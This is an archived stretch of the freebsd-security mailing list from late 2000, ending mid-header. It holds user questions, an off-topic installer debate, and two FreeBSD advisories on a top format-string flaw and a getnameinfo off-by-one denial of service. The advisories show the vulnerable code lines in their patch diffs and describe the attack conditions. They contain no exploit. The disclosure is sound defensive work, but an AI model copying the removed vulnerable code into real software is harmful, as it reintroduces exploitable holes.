exLfhSV1KHQ6QixjJ5+Ve0vvfhmHHYbqo925zpZkGsIUbkSsfOaP6E0PcR9AOKYAo4d49vmUhl6t 6sBeduvZFKNdbnp8DKVLVX8GGSl/npom1Wq7OCQIapjHsdqjmJH9edvlWsQcuQIDAQABoxMwETAP BgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBBAUAA4GBAMfskn5O+PWWpWdiKqTwTRFg0G+NYFhh rCa7UjVcCM8w+6hKloofYkIjjBcP9LpknBesRynfnZhe0mxgcVyirNx54+duAEcftQ0o6AKd5Jr9 E/Sm2Xyx+NxfIyYJkYBz0BQb3kOpgyXy5pwvFcr+pquKB3WLDN1RhGvk+NHOd6KBMYIBwDCCAbwC AQEwgZowgZIxCzAJBgNVBAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNVBAcTCUNh cGUgVG93bjEPMA0GA1UEChMGVGhhd3RlMR0wGwYDVQQLExRDZXJ0aWZpY2F0ZSBTZXJ2aWNlczEo MCYGA1UEAxMfUGVyc29uYWwgRnJlZW1haWwgUlNBIDIwMDAuOC4zMAIDA4btMAkGBSsOAwIaBQCg fTAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEPFw0wMDExMDEwMzM3NTla MB4GCSqGSIb3DQEJDzERMA8wDQYIKoZIhvcNAwICASgwIwYJKoZIhvcNAQkEMRYEFAuY95ffXsnL NiJdIAx9gXotAu9NMA0GCSqGSIb3DQEBAQUABIGAxg5WQ8KUCEgqGYO0QrnJKPPE25y08e+4Uacx a/iknV2YhBX9+5qZSUgLd5HYUXXF5yxSr1RojBUF7EXUi8K3yElJuVqlyrunurnF2UomqJpMtL1Y fyKGKTwQBO84iDsVgPzaPRA+XJKt56gNhHITR5aqH/QnETGKpQJ6btbwuZYAAAAAAAA= ------=_NextPart_000_006E_01C0438B.38EA05B0-- _____NetZero Free Internet Access and Email______ http://www.netzero.net/download/index.html To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 19:41:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 1E61837B4C5; Tue, 31 Oct 2000 19:41:46 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eA13hj318692; Tue, 31 Oct 2000 19:43:45 -0800 (PST) (envelope-from kris) Date: Tue, 31 Oct 2000 19:43:45 -0800 From: Kris Kennaway To: "Jonathan M. Slivko" Cc: freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Majordomo List-Server Message-ID: <20001031194345.A18675@citusc17.usc.edu> References: <007401c043b5$239fca30$22492026@CORESYNC> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="mYCpIKhGyMATD0i+" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <007401c043b5$239fca30$22492026@CORESYNC>; from jslivko@belgacom.net on Tue, Oct 31, 2000 at 10:37:59PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --mYCpIKhGyMATD0i+ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Oct 31, 2000 at 10:37:59PM -0500, Jonathan M. Slivko wrote: > Does anyone know of any vulnerabilities or anything like that in the Majordomo port? I would really like to know. Thanks. See the warning the port gives you at install-time, and the FreeBSD Security advisory about the matter. Kris --mYCpIKhGyMATD0i+ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjn/kXAACgkQWry0BWjoQKUPxACgm7Zt8QBdgj5i2w4fLchqBo2M X+wAoIIEFe/8JucUA6eDjX1x04XjjN1O =PcoB -----END PGP SIGNATURE----- --mYCpIKhGyMATD0i+-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 19:43:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail7.wlv.netzero.net (mail7.wlv.netzero.net [209.247.163.57]) by hub.freebsd.org (Postfix) with SMTP id 2A06D37B4CF for ; Tue, 31 Oct 2000 19:43:52 -0800 (PST) Received: (qmail 28492 invoked from network); 1 Nov 2000 03:43:35 -0000 Received: from ip34.bedford4.ma.pub-ip.psi.net (HELO CORESYNC) (38.32.73.34) by mail7.wlv.netzero.net with SMTP; 1 Nov 2000 03:43:35 -0000 Message-ID: <00b301c043b6$01fed280$22492026@CORESYNC> From: "Jonathan M. Slivko" To: "Kris Kennaway" Cc: , References: <007401c043b5$239fca30$22492026@CORESYNC> <20001031194345.A18675@citusc17.usc.edu> Subject: Re: Majordomo List-Server Date: Tue, 31 Oct 2000 22:44:14 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.3018.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thank you for the information. -- Jonathan M. Slivko ----- Original Message ----- From: "Kris Kennaway" To: "Jonathan M. Slivko" Cc: ; Sent: Tuesday, October 31, 2000 10:43 PM Subject: Re: Majordomo List-Server ____________NetZero Free Internet Access and Email_________ Download Now http://www.netzero.net/download/index.html Request a CDROM 1-800-333-3633 ___________________________________________________________ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 23: 0:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from sol.cc.u-szeged.hu (sol.cc.u-szeged.hu [160.114.8.24]) by hub.freebsd.org (Postfix) with ESMTP id 92C9737B4C5 for ; Tue, 31 Oct 2000 23:00:47 -0800 (PST) Received: from petra.hos.u-szeged.hu by sol.cc.u-szeged.hu (8.9.3+Sun/SMI-SVR4) id IAA28840; Wed, 1 Nov 2000 08:00:17 +0100 (MET) Received: from sziszi by petra.hos.u-szeged.hu with local (Exim 3.12 #1 (Debian)) id 13qrt0-0000JT-00 for ; Wed, 01 Nov 2000 08:00:38 +0100 Date: Wed, 1 Nov 2000 08:00:38 +0100 From: Szilveszter Adam To: security@FreeBSD.ORG Subject: Re: Installer Message-ID: <20001101080038.B846@petra.hos.u-szeged.hu> Mail-Followup-To: security@FreeBSD.ORG References: <657B20E93E93D4118F9700D0B73CE3EA024251@goofy.epylon.lan> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/1.0.1i In-Reply-To: <657B20E93E93D4118F9700D0B73CE3EA024251@goofy.epylon.lan>; from Jason.DiCioccio@Epylon.com on Tue, Oct 31, 2000 at 06:45:57PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 31, 2000 at 06:45:57PM -0800, Jason DiCioccio wrote: > Ah, then I stand corrected :).. Surprised they install lynx by default > though.. Yes because otherwise ppl will complain that they cannot read the FAQ and many docs that are in HTML. In fact, this is one of the few regular complaints I get from people installing FreeBSD for the first time. Just imagine, your install went through flawlessly, you were too afraid to touch too many options during it, now you have rebooted, and there you go... but what to do now. In OpenBSD there is at least an afterboot(8) man page that comes up right at first start. We don't have anything like it. Then you hear: read the Handbook. And you discover, that you cannot because it is HTML. Grand feeling, eh? We somehow seem to think that a person installing FreeBSD either has access to a second machine with Net connection to read up if need be (not common) or has already printed/learned by heart all the important docs from www.freebsd.org. This, of course is only a problem on your first install and only if you do not have the "Xmas Special Edition" box, where a hacker is also included packaged up fine in plastic and mistletoe. (Was not very popular because the box was too huge and heavy to fit into public transport in Europe.) Sure, minimalists will claim that there should not be any important docs in HTML but just man pages. Anyways, this thread has absolutely nothing to do with security, so it should end. There is no OS today that comes below 200megs in a default install (DOS is not an OS by today's standards.) -- Regards: Szilveszter ADAM Szeged University Szeged Hungary To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 0:55:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id B98A437B4D7 for ; Wed, 1 Nov 2000 00:55:51 -0800 (PST) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.1/8.9.3) with ESMTP id eA18tbU21851; Wed, 1 Nov 2000 00:55:38 -0800 (PST) (envelope-from jkh@winston.osd.bsdi.com) To: Szilveszter Adam Cc: security@FreeBSD.ORG Subject: Re: Installer In-Reply-To: Message from Szilveszter Adam of "Wed, 01 Nov 2000 08:00:38 +0100." <20001101080038.B846@petra.hos.u-szeged.hu> Date: Wed, 01 Nov 2000 00:55:37 -0800 Message-ID: <21847.973068937@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > complaints I get from people installing FreeBSD for the first time. Just > imagine, your install went through flawlessly, you were too afraid to touch > too many options during it, now you have rebooted, and there you go... but > what to do now. In OpenBSD there is at least an afterboot(8) man page that Well, if you were one of those FreeBSD users who actually read the instructions telling you to run /stand/sysinstall again if you wanted to do any post-installation configuration (or if you even read through the menus a bit more carefully your first time through), you'd do that and then visit the Documentation menu. The Documentation menu would auto-load lynx when you asked for any of the HTML docs listed there and voila, there would be the docs without you having to know anything. This has all been supported for several years now and people have been using it rather significantly for a feature you claim we don't have anything like. :-) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 2:36:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id D01BE37B479 for ; Wed, 1 Nov 2000 02:36:46 -0800 (PST) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id FAA79280; Wed, 1 Nov 2000 05:38:21 -0500 (EST) (envelope-from rjh@mohawk.net) Date: Wed, 1 Nov 2000 05:38:20 -0500 (EST) From: Ralph Huntington To: Szilveszter Adam , security@FreeBSD.ORG Subject: Re: Installer In-Reply-To: <21847.973068937@winston.osd.bsdi.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > complaints I get from people installing FreeBSD for the first time. Just > > imagine, your install went through flawlessly, you were too afraid to touch > > too many options during it, now you have rebooted, and there you go... but > > what to do now. In OpenBSD there is at least an afterboot(8) man page that Puh-lease. I install and admin many BSD machines, mostly FreeBSD and OpenBSD, and I would say that OpenBSD requires more knowledge to make something useful - out of the box - than FreeBSD does. I clearly recall the first time I installed OpenBSD (after about four years of FreeBSD experience). I sat there wondering "Okay, what now." It was not clear at all. Eventually I found the afterboot man page and I did think that was useful, but it was in no way easier or more intuitive than FreeBSD's sysinstall. IMNSHO, I think FreeBSD is the easiest unix or unix-like OS to install and configure. Really, I hardly see what there is to complain about. As soon as you boot the first time, you get led right back to sysinstall where you can make the fresh install into a server or a workstation or whatever, without really having to know very much at all. There's my 25 cents. Thanks for listening. - Ralph To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 3:26: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from lists01.iafrica.com (lists01.iafrica.com [196.7.0.141]) by hub.freebsd.org (Postfix) with ESMTP id 3EB7E37B4C5 for ; Wed, 1 Nov 2000 03:26:03 -0800 (PST) Received: from nwl.fw.uunet.co.za ([196.31.2.162]) by lists01.iafrica.com with esmtp (Exim 3.12 #2) id 13qw1d-0001O8-00; Wed, 01 Nov 2000 13:25:49 +0200 Received: (from nobody@localhost) by nwl.fw.uunet.co.za (8.8.8/8.6.9) id NAA22742; Wed, 1 Nov 2000 13:25:56 +0200 (SAST) Received: by nwl.fw.uunet.co.za via recvmail id 22600; Wed Nov 1 13:25:27 2000 Received: from sheldonh (helo=axl.fw.uunet.co.za) by axl.fw.uunet.co.za with local-esmtp (Exim 3.16 #1) id 13qw1H-000I7O-00; Wed, 01 Nov 2000 13:25:27 +0200 From: Sheldon Hearn To: Ralph Huntington Cc: Szilveszter Adam , security@freebsd.org Subject: Re: Installer In-reply-to: Your message of "Wed, 01 Nov 2000 05:38:20 EST." Date: Wed, 01 Nov 2000 13:25:27 +0200 Message-ID: <69649.973077927@axl.fw.uunet.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 01 Nov 2000 05:38:20 EST, Ralph Huntington wrote: > Puh-lease. I install and admin many BSD machines, mostly FreeBSD and > OpenBSD, and I would say that OpenBSD requires more knowledge to make > something useful - out of the box - than FreeBSD does. Discussions like this rarely result in something useful, because they're very unfocused. I would urge you both to consider trying to come up with concrete ideas (ideally backed up with code or documentation contributions) for improving the status quo. I would also like to suggest that further discussion take place off the freebsd-security mailing list, with which this line of discussion has only the most tenuous of links. :-) Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 4: 3:25 2000 Delivered-To: freebsd-security@freebsd.org Received: from apse.cc.rtu.lv (unknown [159.148.95.241]) by hub.freebsd.org (Postfix) with ESMTP id 71E6137B4FE for ; Wed, 1 Nov 2000 04:03:21 -0800 (PST) Received: from apse.cc.rtu.lv (Watchers.cs.rtu.lv [159.148.55.162]) by apse.cc.rtu.lv (8.9.0/8.9.0) with ESMTP id OAA23178 for ; Wed, 1 Nov 2000 14:02:20 +0200 (EET) Message-ID: <3A00065B.A077B2ED@apse.cc.rtu.lv> Date: Wed, 01 Nov 2000 14:02:35 +0200 From: System administrator Organization: Riga TU X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: subscribe Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 6:45:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by hub.freebsd.org (Postfix) with ESMTP id C1DCB37B4C5 for ; Wed, 1 Nov 2000 06:45:33 -0800 (PST) Received: (from smap@localhost) by proxy.centtech.com (8.8.4/8.6.9) id IAA00909 for ; Wed, 1 Nov 2000 08:45:28 -0600 (CST) Received: from sprint.centtech.com(10.177.173.31) by proxy.centtech.com via smap (V2.0/2.1+anti-relay+anti-spam) id xma000906; Wed, 1 Nov 00 08:45:12 -0600 Received: from centtech.com (shiva [10.177.173.77]) by sprint.centtech.com (8.9.3+Sun/8.9.3) with ESMTP id IAA12766 for ; Wed, 1 Nov 2000 08:45:12 -0600 (CST) Message-ID: <3A002C78.7F3537D4@centtech.com> Date: Wed, 01 Nov 2000 08:45:12 -0600 From: Eric Anderson Reply-To: anderson@centtech.com Organization: Centaur Technology X-Mailer: Mozilla 4.73 [en] (X11; U; Linux 2.2.14-5.0smp i686) X-Accept-Language: en MIME-Version: 1.0 To: security Subject: pipsecd - thru port Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm using ipsec (with pipsecd on two FreeBSD 4.1 machines) to build a VPN. I need to go thru a firewall, but I don't know which ports to forward thru, or if this is even possible.. So here's what I want to do: ----- ----- ------ | A | -----|FW |------| B | ----- ----- ------ machine A is a freebsd box inside the firewall (FW), B is the freebsd box outside the firewall attempting to connect to A thru FW, in other words, B thinks its connecting to FW port XX, but FW forwards port XX to port XX on A, connecting the vpn thru the FW.. I currently have VPN's set up with linux boxen with the SSH+PPP method, which works alright, it would just work a LOT better with ipsec and such.. So, what ports do i need to forward on FW to make this all work? -- ------------------------------------------------------------------------------- Eric Anderson anderson@centtech.com Centaur Technology (512) 418-5792 What does "it" mean in the sentence "What time is it?"? ------------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 12:27:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id 2CE9F37B4C5 for ; Wed, 1 Nov 2000 12:27:35 -0800 (PST) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13r4Tn-0002VP-00; Wed, 01 Nov 2000 22:27:27 +0200 Date: Wed, 1 Nov 2000 22:27:27 +0200 (IST) From: Roman Shterenzon To: Jason DiCioccio Cc: freebsd-security@freebsd.org Subject: RE: Installer In-Reply-To: <657B20E93E93D4118F9700D0B73CE3EA024250@goofy.epylon.lan> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 31 Oct 2000, Jason DiCioccio wrote: > Web browsers and Web servers? No, this is all in ports, just as in FreeBSD.. Speaking as of OpenBSD 2.6, apache+mod_ssl is in the base system. Please check things before posting, it can confuse people that read the list. > 4.1.1.. I'm not sure how minimalistic you're looking for.. perhaps try > picobsd, that should be small enough for ya! PiboBSD is broken, no one seems to maintain it, and my patches weren't committed (or even considered I believe). --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 15: 0:21 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id E5B2C37B479; Wed, 1 Nov 2000 14:59:54 -0800 (PST) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-00:62.top Reply-To: security-advisories@freebsd.org Message-Id: <20001101225954.E5B2C37B479@hub.freebsd.org> Date: Wed, 1 Nov 2000 14:59:54 -0800 (PST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:62 Security Advisory FreeBSD, Inc. Topic: top allows reading of kernel memory Category: core Module: top Announced: 2000-11-01 Credits: vort@wiretapped.net via OpenBSD Affects: FreeBSD 3.x (all releases), FreeBSD 4.x (all releases prior to 4.2), FreeBSD 3.5.1-STABLE and 4.1.1-STABLE prior to the correction date. Corrected: 2000/10/04 (FreeBSD 4.1.1-STABLE) 2000/10/04 (FreeBSD 3.5.1-STABLE) FreeBSD only: NO I. Background top is a utility for displaying current system resource statistics such as process CPU and memory use. It is externally-maintained, contributed software which is included in FreeBSD by default. II. Problem Description A "format string vulnerability" was discovered in the top(1) utility which allows unprivileged local users to cause the top process to execute arbitrary code. The top utility runs with increased privileges as a member of the kmem group, which allows it to read from kernel memory (but not write to it). A process with the ability to read from kernel memory can monitor privileged data such as network traffic, disk buffers and terminal activity, and may be able to leverage this to obtain further privileges on the local system or on other systems, including root privileges. All released versions of FreeBSD prior to the correction date including 4.0, 4.1, 4.1.1 and 3.5.1 are vulnerable to this problem, but it was fixed in the 4.1.1-STABLE branch prior to the release of FreeBSD 4.2-RELEASE. III. Impact Local users can read privileged data from kernel memory which may provide information allowing them to further increase their local or remote system access privileges. IV. Workaround Remove the setgid bit on the top utilities. This has the side-effect that users who are not a member of the kmem group or who are not the superuser cannot use the top utility. # chmod g-s /usr/bin/top V. Solution One of the following: 1) Upgrade your vulnerable FreeBSD system to 4.1.1-STABLE or 3.5.1-STABLE after the respective correction dates. 2) Apply the patch below and recompile the relevant files: Either save this advisory to a file, or download the patch and detached PGP signature from the following locations, and verify the signature using your PGP utility. ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:62/top.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:62/top.patch.asc Execute the following commands as root: # cd /usr/src/contrib/top # patch -p < /path/to/patch_or_advisory # cd /usr/src/usr.bin/top # make depend && make all install Patch for vulnerable systems: Index: display.c =================================================================== RCS file: /mnt/ncvs/src/contrib/top/display.c,v retrieving revision 1.4 retrieving revision 1.5 diff -u -r1.4 -r1.5 --- display.c 1999/01/09 20:20:33 1.4 +++ display.c 2000/10/04 23:34:16 1.5 @@ -829,7 +831,7 @@ register int i; /* first, format the message */ - (void) sprintf(next_msg, msgfmt, a1, a2, a3); + (void) snprintf(next_msg, sizeof(next_msg), msgfmt, a1, a2, a3); if (msglen > 0) { Index: top.c =================================================================== RCS file: /mnt/ncvs/src/contrib/top/top.c,v retrieving revision 1.4 retrieving revision 1.5 diff -u -r1.4 -r1.5 --- top.c 1999/01/09 20:20:34 1.4 +++ top.c 2000/10/04 23:34:16 1.5 @@ -807,7 +809,7 @@ { if ((errmsg = kill_procs(tempbuf2)) != NULL) { - new_message(MT_standout, errmsg); + new_message(MT_standout, "%s", errmsg); putchar('\r'); no_command = Yes; } -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOgCfWFUuHi5z0oilAQECnwP8CCL5roxtZIfgV7yEfNGW3u61+NNfFK7V bEsygpUlT0/KGLM1gBWkMhn7oTlrYk4xJ01SdXenlBJg05ScS6qd8MhJ2TgqsS2l f5w7ZIvZhSu+V+mLKmjmc52aHM+9Jth2ejyRwlcxWa+tE1XXCUK0KO6oaXod0TR9 g0TXn2UfHJ4= =eU0t -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 15: 1: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id B57DC37B696; Wed, 1 Nov 2000 15:00:35 -0800 (PST) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-00:63.getnameinfo Reply-To: security-advisories@freebsd.org Message-Id: <20001101230035.B57DC37B696@hub.freebsd.org> Date: Wed, 1 Nov 2000 15:00:35 -0800 (PST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:63 Security Advisory FreeBSD, Inc. Topic: getnameinfo function allows remote denial of service Category: core Module: libc Announced: 2000-11-01 Credits: Pavel Kankovsky Affects: FreeBSD 4.x (all releases prior to 4.2), 4.1.1-STABLE prior to the correction date. Corrected: 2000/09/25 (FreeBSD 4.1.1-STABLE) FreeBSD only: NO I. Background The getnameinfo() function is part of the protocol-independent resolver library from the KAME project. II. Problem Description An off-by-one error exists in the processing of DNS hostnames which allows a long DNS hostname to crash the getnameinfo() function when an address resolution of the hostname is performed (e.g. in response to a connection to a service which makes use of getnameinfo()). Under the following conditions, this bug can be used as a denial of service attack against vulnerable services: * The attacker must control their DNS server. * The service must be run as a persistent daemon (i.e. running "standalone", not spawned as-needed from a supervisor process such as inetd) * The daemon must perform the getnameinfo() call on the remote hostname prior to forking a child process to handle the connection (otherwise it is just the child process which dies, and the parent remains running). * The daemon is not automatically restarted by a "watchdog" process. All released versions of FreeBSD 4.x prior to the correction date including 4.0, 4.1, and 4.1.1 are vulnerable to this problem, but it was fixed in the 4.1.1-STABLE branch prior to the release of FreeBSD 4.2-RELEASE. The FreeBSD 3.x branch is unaffected since it does not include the KAME code. Note that this vulnerability is not believed to pose a vulnerability for any servers included in the FreeBSD base system. It is only a potential problem for certain third party servers fulfilling the above conditions (none of which are currently known). Therefore the impact on the vast majority of FreeBSD systems is expected to be nonexistent. III. Impact Remote users may be able to cause a very small class of network servers to terminate abnormally, causing a denial of service condition. IV. Workaround None practical. V. Solution One of the following: 1) Upgrade your vulnerable FreeBSD 4.x system to 4.1.1-STABLE after the correction date. 2) Apply the patch below and recompile the relevant files: Either save this advisory to a file, or download the patch and detached PGP signature from the following locations, and verify the signature using your PGP utility. ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:63/getnameinfo.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:63/getnameinfo.patch.asc Execute the following commands as root: # cd /usr/src/lib/libc # patch -p < /path/to/patch_or_advisory # make depend && make all install Patch for vulnerable systems: --- net/getnameinfo.c 2000/07/05 05:09:17 1.5 +++ net/getnameinfo.c 2000/09/25 23:04:36 1.6 @@ -154,12 +153,12 @@ (flags & NI_DGRAM) ? "udp" : "tcp"); } if (sp) { - if (strlen(sp->s_name) > servlen) + if (strlen(sp->s_name) + 1 > servlen) return ENI_MEMORY; strcpy(serv, sp->s_name); } else { snprintf(numserv, sizeof(numserv), "%d", ntohs(port)); - if (strlen(numserv) > servlen) + if (strlen(numserv) + 1 > servlen) return ENI_MEMORY; strcpy(serv, numserv); } @@ -253,7 +252,7 @@ *p = '\0'; } #endif - if (strlen(hp->h_name) > hostlen) { + if (strlen(hp->h_name) + 1 > hostlen) { freehostent(hp); return ENI_MEMORY; } -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOgCgVlUuHi5z0oilAQGqfwP/SYLG0yD0uR4wdPHy5S9eXH4HqtNrVpF7 NlN3iMjHrzIDqeFSYoRTbMEhrbTTGMWYIEadadW9zjlnHfGNRniYx2oOhm+0tqsI C3wlqsGAo2GXsXfr1hOpcVc1GqLhsK3oLgz9RRMoMlRWJ+K0bHHLwKlB9uEoxPJ2 X/WHJ//RQXI= =YFwv -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 15:34:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from mercury.ccmr.cornell.edu (mercury.ccmr.cornell.edu [128.84.231.97]) by hub.freebsd.org (Postfix) with ESMTP id 6B74137B479 for ; Wed, 1 Nov 2000 15:34:10 -0800 (PST) Received: from khitomer.msc.cornell.edu (IDENT:0@khitomer.msc.cornell.edu [128.84.249.245]) by mercury.ccmr.cornell.edu (8.9.3/8.9.3) with ESMTP id SAA05230 for ; Wed, 1 Nov 2000 18:34:11 -0500 Received: from localhost (mitch@localhost) by khitomer.msc.cornell.edu (8.9.3/8.9.3) with ESMTP id SAA12424 for ; Wed, 1 Nov 2000 18:34:09 -0500 X-Authentication-Warning: khitomer.msc.cornell.edu: mitch owned process doing -bs Date: Wed, 1 Nov 2000 18:34:09 -0500 (EST) From: Mitch Collinsworth To: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:62.top In-Reply-To: <20001101225954.E5B2C37B479@hub.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 1 Nov 2000, FreeBSD Security Advisories wrote: > All released versions of FreeBSD prior to the correction date > including 4.0, 4.1, 4.1.1 and 3.5.1 are vulnerable to this problem, > but it was fixed in the 4.1.1-STABLE branch prior to the release of > FreeBSD 4.2-RELEASE. There's a 4.2-RELEASE ?? -Mitch To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 15:38:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from libertad.univalle.edu.co (libertad.univalle.edu.co [216.6.69.11]) by hub.freebsd.org (Postfix) with ESMTP id 5A11F37B4C5 for ; Wed, 1 Nov 2000 15:38:31 -0800 (PST) Received: from localhost (buliwyf@localhost) by libertad.univalle.edu.co (8.10.0/8.10.0) with ESMTP id eA1Nkl267255 for ; Wed, 1 Nov 2000 18:46:47 -0500 (COT) Date: Wed, 1 Nov 2000 18:46:47 -0500 (COT) From: Buliwyf McGraw To: security@FreeBSD.ORG Subject: Console Message Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi... few days ago, i have a new message in my console, but i dont know what it means or which program is generating this: icmp_request bandwidth limit 105/100 pps icmp_request bandwidth limit 120/100 pps icmp_request bandwidth limit 117/100 pps icmp_request bandwidth limit 108/100 pps It is a security problem? ======================================================================= Buliwyf McGraw Administrador del Servidor Libertad Centro de Servicios de Informacion Universidad del Valle ======================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 15:39:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from odin.ac.hmc.edu (Odin.AC.HMC.Edu [134.173.32.75]) by hub.freebsd.org (Postfix) with ESMTP id E94C637B4D7 for ; Wed, 1 Nov 2000 15:39:43 -0800 (PST) Received: (from brdavis@localhost) by 